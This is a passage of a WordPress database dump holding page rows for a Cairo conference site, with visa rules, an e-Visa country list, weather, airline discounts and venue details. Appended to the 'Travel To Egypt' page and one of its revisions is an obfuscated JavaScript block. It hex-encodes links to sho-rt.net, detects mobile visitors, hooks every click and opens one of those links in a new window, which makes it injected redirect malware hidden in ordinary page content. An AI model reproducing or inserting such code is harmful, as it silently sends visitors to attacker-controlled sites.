data-saferedirecturl=\"https://www.google.com/url?q=https://visa2egypt.gov.eg/eVisa/Home?VISTK%3DOA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9&amp;source=gmail&amp;ust=1685249456207000&amp;usg=AOvVaw3sDw0ljxu0W2nRhsTa3oTm\">https://visa2egypt.gov.eg/eVisa/Home?VISTK=OA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9</a>)</strong></span>. Nationals of the countries listed below may be issued with an e-Visa upon application on the Egypt e-Visa Portal</li>\n</ul>\n<p style=\"font-weight: 400;\"><strong> </strong></p>\n<table style=\"font-weight: 400;\" width=\"1088\">\n<tbody>\n<tr>\n<td>Albania</td>\n<td>Argentina</td>\n<td>Armenia</td>\n<td>Australia</td>\n</tr>\n<tr>\n<td>Austria</td>\n<td>Azerbaijan</td>\n<td>Bahrain</td>\n<td>Belarus</td>\n</tr>\n<tr>\n<td>Belgium</td>\n<td>Bolivia</td>\n<td>Bosnia and Herzegovina</td>\n<td>Brazil</td>\n</tr>\n<tr>\n<td>Bulgaria</td>\n<td>Canada</td>\n<td>Chile</td>\n<td>China</td>\n</tr>\n<tr>\n<td>China/Hong Kong</td>\n<td>China/Taiwan</td>\n<td>Colombia</td>\n<td>Croatia</td>\n</tr>\n<tr>\n<td>Cyprus</td>\n<td>Czech</td>\n<td>Denmark</td>\n<td>Ecuador</td>\n</tr>\n<tr>\n<td>Estonia</td>\n<td>Finland</td>\n<td>France</td>\n<td>Georgia</td>\n</tr>\n<tr>\n<td>Germany</td>\n<td>Greece</td>\n<td>Hungary</td>\n<td>Iceland</td>\n</tr>\n<tr>\n<td>India</td>\n<td>Ireland</td>\n<td>Italy</td>\n<td>Japan</td>\n</tr>\n<tr>\n<td>Kazakhstan</td>\n<td>Korea (South)</td>\n<td>Kuwait</td>\n<td>Latvia</td>\n</tr>\n<tr>\n<td>Lithuania</td>\n<td>Luxembourg</td>\n<td>Macedonia</td>\n<td>Malaysia</td>\n</tr>\n<tr>\n<td>Malta</td>\n<td>Mexico</td>\n<td>Moldova</td>\n<td>Monaco</td>\n</tr>\n<tr>\n<td>Montenegro</td>\n<td>Netherlands</td>\n<td>New Zealand</td>\n<td>Norway</td>\n</tr>\n<tr>\n<td>Oman</td>\n<td>Paraguay</td>\n<td>Peru</td>\n<td>Poland</td>\n</tr>\n<tr>\n<td>Portugal</td>\n<td>Qatar</td>\n<td>Republic of Kosovo</td>\n<td>Romania</td>\n</tr>\n<tr>\n<td>Russian Federation</td>\n<td>San Marino</td>\n<td>Saudi Arabia</td>\n<td>Serbia</td>\n</tr>\n<tr>\n<td>Singapore</td>\n<td>Slovakia</td>\n<td>Slovenia</td>\n<td>South Africa</td>\n</tr>\n<tr>\n<td>Spain</td>\n<td>Sweden</td>\n<td>Switzerland</td>\n<td>Ukraine</td>\n</tr>\n<tr>\n<td>United Arab Emirates</td>\n<td>United Kingdom (England, Northern Ireland, Scotland and Wales)</td>\n<td>United States of America</td>\n<td>Uruguay</td>\n</tr>\n<tr>\n<td>Vatican</td>\n<td>Venezuela</td>\n<td></td>\n<td></td>\n</tr>\n</tbody>\n</table>\n<p style=\"font-weight: 400;\"><strong> </strong></p>\n<ul style=\"font-weight: 400;\">\n<li>Weather: in September: Around 25-30 degree in Cairo</li>\n<li>Cairo is reachable from over 70 countries through Egypt Air and Star Alliance members. The local organizing committee arranged for additional discount on air tickets from Egypt Air (Star Alliance). Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to: <strong><span style=\"color: #808080;\"><a style=\"color: #808080;\" href=\"mailto:GSW-EGYPTAIR@gsw2023.com\">GSW-EGYPTAIR@gsw2023.com</a></span></strong></li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Travel To Egypt','','publish','closed','closed','','travel-to-egypt','','','2023-06-01 08:58:58','2023-06-01 08:58:58','',0,'https://gsw2023.com/?page_id=2675',0,'page','',0),
(2677,1,'2022-10-09 02:29:25','2022-10-09 02:29:25','','Travel To Egypt','','inherit','closed','closed','','2675-revision-v1','','','2022-10-09 02:29:25','2022-10-09 02:29:25','',2675,'https://gsw2023.com/?p=2677',0,'revision','',0),
(2678,1,'2022-10-09 02:39:27','2022-10-09 02:39:27','<p>[vc_row][vc_column][vc_column_text]</p>\n<p style=\"color: red;\"><strong>Entry Visa:</strong></p>\n<ul>\n<li>\n<h6><strong>-Can be obtained at the Cairo International Airport upon arrival</strong></h6>\n</li>\n<li>\n<h6><strong>-Cost of the Visa: Tourist: US$15 (single- or multiple-entry)</strong></h6>\n</li>\n</ul>\n<p style=\"color: red;\"><strong>Weather: <a style=\"color: black;\">in September: Around 30 degree in Cairo</a></strong></p>\n<ul>\n<li>\n<h6><strong>Cairo is reachable from over 70 countries through Egypt Air and Star Alliance members. The local organizing committee will apply to Star Alliance Convention Plus for additional discount on air tickets and a code will be provided to registered members</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Travel To Egypt','','inherit','closed','closed','','2675-revision-v1','','','2022-10-09 02:39:27','2022-10-09 02:39:27','',2675,'https://gsw2023.com/?p=2678',0,'revision','',0),
(2679,1,'2022-10-09 02:41:59','2022-10-09 02:41:59','<p>[vc_row][vc_column][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<h5 class=\"clear\"><span style=\"font-family: droid-serif; color: #3366ff;\"><strong><a style=\"color: #3366ff;\"><span style=\"font-size: 12pt;\">GSW2023 will take place at the INTERCONTINENTAL CAIRO SEMIRAMIS</span> </a></strong></span></h5>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li><strong>On the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. The conference venue hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo. For more information about the conference venue, please visit the conference web site <span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/\">https://gsw2023.com/</a>.</span></strong></li>\n</ul>\n</li>\n<li 